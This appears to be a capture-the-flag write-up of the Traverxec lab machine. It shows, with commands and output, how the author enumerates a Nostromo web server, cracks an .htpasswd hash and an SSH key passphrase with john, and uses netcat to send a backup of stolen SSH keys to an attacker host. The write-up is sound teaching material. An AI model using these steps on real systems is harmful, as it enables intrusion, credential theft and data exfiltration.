nostromo
Checking for the web application directory after performing some basic enumeration
www-data@traverxec:/var$ ll
total 48K
4.0k drwxr-xr-x 5 root root 4.0k sep 17 03:25 log
4.0k drwxrwxrwt 3 root root 4.0k sep 17 03:25 tmp
4.0k drwxr-xr-x 2 root root 4.0k sep 17 03:25 backups
4.0K drwxr-xr-x 9 root root 4.0K Sep 16 2022 cache
4.0K drwxr-xr-x 18 root root 4.0K Sep 16 2022 ..
4.0K drwxr-xr-x 26 root root 4.0K Sep 16 2022 lib
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 nostromo
4.0K drwxr-xr-x 12 root root 4.0K Oct 25 2019 .
4.0K drwxr-xr-x 4 root root 4.0K Oct 25 2019 spool
0 lrwxrwxrwx 1 root root 9 Oct 25 2019 lock -> /run/lock
0 lrwxrwxrwx 1 root root 4 Oct 25 2019 run -> /run
4.0K drwxrwsr-x 2 root mail 4.0K Oct 25 2019 mail
4.0K drwxr-xr-x 2 root root 4.0K Oct 25 2019 opt
4.0K drwxrwsr-x 2 root staff 4.0K May 13 2019 localInterestingly, the usual www directory is not present in the /var directory
Instead, there is the nostromo directory
www-data@traverxec:/var$ cd cd nostromo ; ll
total 24K
4.0k drwxr-xr-x 2 www-data daemon 4.0k sep 17 03:25 logs
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 27 2019 conf
4.0K drwxr-xr-x 6 root daemon 4.0K Oct 25 2019 htdocs
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 .
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 25 2019 icons
4.0K drwxr-xr-x 12 root root 4.0K Oct 25 2019 ..I will check both logs and conf directories
logs
www-data@traverxec:/var/nostromo$ cd logs ; ll
total 12K
4.0K drwxr-xr-x 2 www-data daemon 4.0K Sep 17 03:25 .
4.0K -rw-r--r-- 1 www-data www-data 4 Sep 17 03:25 nhttpd.pid
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 ..
www-data@traverxec:/var/nostromo/logs$ cat nhttpd.pid
442The logs directory contains a file indicating the assigned PID for the nhttpd(nostromo) instance
conf
www-data@traverxec:/var/nostromo/conf$ ll
total 20K
4.0K drwxr-xr-x 2 root daemon 4.0K Oct 27 2019 .
4.0K -rw-r--r-- 1 root bin 41 Oct 25 2019 .htpasswd
4.0K -rw-r--r-- 1 root bin 498 Oct 25 2019 nhttpd.conf
4.0K drwxr-xr-x 6 root root 4.0K Oct 25 2019 ..
4.0K -rw-r--r-- 1 root bin 2.9K Oct 25 2019 mimesChecking .htpasswd and nhttpd.conf
.htpasswd
www-data@traverxec:/var/nostromo/conf$ cat .htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/The .htpasswd file contains the hashstring for the david user.
This was initially enumerated by PEAS earlier
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ john david.hash --wordlist=/usr/share/wordlists/rockyou.txt
warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 6 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:00:49 DONE (2023-09-17 16:30) 0.02023g/s 214047p/s 214047c/s 214047C/s NsNsNs..Novaem
Use the "--show" option to display all of the cracked passwords reliably
Session completed. john cracked the password hash for the david user
While this password is for the web application, I will test out password reuse
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh david@$IP
The authenticity of host '10.10.10.165 (10.10.10.165)' can't be established.
ed25519 key fingerprint is sha256:AbyOr506Yqq/VclZ900M6Ijj6qCoveykzcpc/cuIB14.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.165' (ED25519) to the list of known hosts.
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
Permission denied, please try again.
david@10.10.10.165's password:
david@10.10.10.165: Permission denied (publickey,password).
www-data@traverxec:/var/nostromo/conf$ su david
password: Nowonly4me
su: Authentication failureThere is no password reuse
nhttpd.conf
www-data@traverxec:/var/nostromo/conf$ cat nhttpd.conf
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_wwwConfiguration for the web app Interestingly there is a public home directory configured
homedirs & homedirs_bpic
- The Official Documentation of Nostromo reveals that home directories of users can be served with the
homedirsoption enabled- The home directory of the user can be access with
<WEBROOT>/~<USERNAME>
- The home directory of the user can be access with
- It also notes that access control could be achieved with the
homedirs_publicoption- This would restrict public access to a sub-directory within the home directory
There is indeed a page available at the /~david/ endpoint
Additionally, it shows that the endpoint is private space
As the target Nostromo instance is configured with the homedirs_public option enabled, pointing to the public_www endpoint, I should be able to access there.
The /~david/public_www endpoint is not available for some reason
www-data@traverxec:/$ ll /home/david/public_www
total 16K
4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 protected-file-area
4.0K drwx--x--x 5 david david 4.0K Oct 25 2019 ..
4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 .
4.0K -rw-r--r-- 1 david david 402 Oct 25 2019 index.htmlHowever, I am able to reach and read the /home/david/public_www directory as the www-data user from within the system
www-data@traverxec:/$ ll /home/david/public_www/protected-file-area
total 16K
4.0K -rw-r--r-- 1 david david 1.9K Oct 25 2019 backup-ssh-identity-files.tgz
4.0K drwxr-xr-x 2 david david 4.0K Oct 25 2019 .
4.0K -rw-r--r-- 1 david david 45 Oct 25 2019 .htaccess
4.0K drwxr-xr-x 3 david david 4.0K Oct 25 2019 ..
www-data@traverxec:/$ cat /home/david/public_www/protected-file-area/.htaccess
realm David's Protected File Area. Keep out!While the .htpasswd file contains some text, the backup-ssh-identity-files.tgz file appears to be the backup SSH key
www-data@traverxec:/$ nc 10.10.14.17 2222 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ nnc 2222 > backup-ssh-identity-files.tgz
listening on [any] 2222 ...
connect to [10.10.14.17] from (UNKNOWN) [10.10.10.165] 47728
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ tar -xf backup-ssh-identity-files.tgz I will transfer the archive to Kali
SSH
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ tree -a home
home
└── david
└── .ssh
├── authorized_keys
├── id_rsa
└── id_rsa.pub
3 directories, 3 filesThe archive contains the absolute SSH directory of the david user, including the SSH key pair
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh david@$IP -i home/david/.ssh/id_rsa
Enter passphrase for key 'home/david/.ssh/id_rsa': The Private SSH key is password-protected.
Password Cracking
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ ssh2john home/david/.ssh/id_rsa > home/david/.ssh/id_rsa.hashConverting the private SSH key into a crackable hash using ssh2john
┌──(kali㉿kali)-[~/archive/htb/labs/traverxec]
└─$ john home/david/.ssh/id_rsa.hash
using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 6 OpenMP threads
proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
almost done: Processing the remaining buffered candidate passwords, if any.
proceeding with wordlist:/usr/share/john/password.lst
hunter (home/david/.ssh/id_rsa)
1g 0:00:00:00 DONE 2/3 (2023-09-17 17:03) 25.00g/s 1440Kp/s 1440Kc/s 1440KC/s bond007..pumpkin
Use the "--show" option to display all of the cracked passwords reliably
Session completed. john cracked the password for the private SSH key of the david user
Now, I just need to use this to connect to the target system